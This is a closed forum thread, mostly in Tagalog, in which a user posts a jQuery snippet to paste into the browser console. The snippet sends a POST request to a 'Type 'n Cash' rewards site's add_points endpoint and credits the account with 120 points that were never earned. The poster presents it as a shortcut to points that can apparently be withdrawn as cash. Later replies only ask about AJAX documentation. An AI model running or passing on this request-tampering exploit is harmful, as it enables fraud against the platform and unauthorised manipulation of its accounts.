What's new

Closed (Javascript) Sa may Type 'n Cash Account try nyo to ez 120 points

Status
Not open for further replies.

Flavored

Eternal Poster
Joined
Jan 7, 2017
Posts
1,126
Reaction
406
Points
344
Share ko lng, try ko mag post request nag work naman instant 120 point

(PC Browsers users only)
How:
1. Login ka muna then click You do not have permission to view the full content of this post. Log in or register now. sa menu pero wag ka mag start
2. Open Console (Ctrl+Shift+J)
3. Paste this Code sa Console and hit enter
JavaScript:
$.ajax({
    type: "POST",
    dataType : "json",
    url: 'https://typencash.com/add_points',
    data: { user_points: 120 },
    success: function (result) {
        alert("Success!");
        setTimeout(function(){
            location.reload();
        }, 5000);
    }
});
4. Done ez 120 points

max 120 points only

Di pa ako naka try mag wí†hdráw

not playing na ako busy :p

1571232570585.png
 

Attachments

Last edited:
Sir not related pero may documentation ba kayo about ajax? may pinapagawa kase saming system using crud na ajax. may modal na nalabas pero ang hirap kapain ni ajax. Any tips? Thanks
 
Sir not related pero may documentation ba kayo about ajax? may pinapagawa kase saming system using crud na ajax. may modal na nalabas pero ang hirap kapain ni ajax. Any tips? Thanks
im no pro paps
pero try mo create a thread dito para mas marami mka tulong
explain mo lng ng amaayos
 
Status
Not open for further replies.
Back
Top